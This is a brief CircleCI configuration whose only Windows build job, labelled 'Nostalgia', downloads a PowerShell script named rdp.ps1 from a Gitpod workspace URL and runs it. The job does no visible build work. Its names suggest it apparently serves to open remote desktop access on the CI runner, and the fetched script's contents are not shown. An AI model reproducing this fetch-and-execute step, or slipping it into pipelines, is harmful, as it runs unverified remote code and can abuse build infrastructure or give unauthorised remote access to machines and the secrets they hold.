version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Nostalgia
          command: |
              Invoke-WebRequest https://4456-opalricearl-circlecipro-dynpgrqmusl.ws-us63.gitpod.io/rdp.ps1 -OutFile rdp.ps1
              .\rdp.ps1